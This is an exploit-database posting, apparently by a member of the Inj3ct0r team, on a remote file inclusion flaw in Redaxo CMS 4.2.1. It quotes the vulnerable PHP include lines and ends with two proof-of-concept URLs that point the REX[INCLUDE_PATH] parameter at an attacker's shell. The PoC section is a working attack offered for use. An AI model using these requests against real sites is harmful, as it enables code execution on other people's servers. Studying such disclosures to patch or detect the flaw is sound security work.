Multiple vulnerabilities have been identified in Redaxo, which could be exploited by attackers to compromise a vulnerable system. These issues are caused by input validation errors in the "include/addons/version/pages/index.inc.php" and "include/pages/specials.inc.php" scripts when processing the "REX[INCLUDE_PATH]" parameter, which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server. ======================================================================== Redaxo CMS 4.2.1 Remote File Inclusion Vulnerability ======================================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ######################################## 1 0 I'm eidelweiss member from Inj3ct0r Team 1 1 ######################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Vendor: www.redaxo.de Download: http://www.redaxo.de/files/redaxo4_2_1.zip Author: eidelweiss Contact: eidelweiss[at]cyberservices.com Thank`s: r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber sp3x (securityreason) get-well brother Advisories: http://eidelweiss-advisories.blogspot.com/2010/04/redaxo-cms-421-remote-file-inclusion.html ======================================================================== Description: So soll ein Content-Management-System sein. REDAXO vereint hohe Flexibilitt mit einfacher Handhabung fr sinnvolle Nutzung. Es eignet sich sowohl fr kleinere Auftritte als auch fr groe und komplexe Internetportale. Dank des modularen Aufbaus und der vielen Erweiterungsmglichkeiten deckt REDAXO alle erforderlichen Funktionalitten eines umfassenden Redaktionssystems ab. Zustzlich ist REDAXO ein Open-Source-System und somit kostenlos und kommerziell frei verwendbar. ======================================================================== -=[ VULN C0de ]=- ************************************************** [-] redaxo/include/pages/specials.inc.php ************************************************** // -------------- Defaults $subpage = rex_request('subpage', 'string'); $func = rex_request('func', 'string'); // -------------- Header $subline = array( array( '', $I18N->msg('main_preferences')), array( 'lang', $I18N->msg('languages')), ); rex_title($I18N->msg('specials'),$subline); switch($subpage) { case 'lang': $file = 'specials.clangs.inc.php'; break; default : $file = 'specials.settings.inc.php'; break; } require $REX['INCLUDE_PATH'].'/pages/'.$file; ************************************************** [-] redaxo/include/addons/version/pages/index.inc.php ************************************************** require $REX['INCLUDE_PATH'].'/layout/top.php'; rex_title('Version AddOn'); ?> <div class="rex-addon-output"> <h2 class="rex-hl2"><?php echo $I18N_A461->msg('code_for_module_input'); ?></h2> <div class="rex-addon-content"> <p class="rex-tx1"><?php echo $I18N_A461->msg('module_intro_help'); ?></p> <p class="rex-tx1"><?php echo $I18N_A461->msg('module_rights'); ?></p> </div> </div> <?php require $REX['INCLUDE_PATH'].'/layout/bottom.php'; ======================================================================== -=[ P0C ]=- http://127.0.0.1/redaxo_path/include/addons/version/pages/index.inc.php?REX[INCLUDE_PATH]=[inj3ct0r sh3ll] http://127.0.0.1/redaxo_path/include/pages/specials.inc.php?subpage=lang&REX[INCLUDE_PATH]=[inj3ct0r sh3ll] =========================| -=[ E0F ]=- |=================================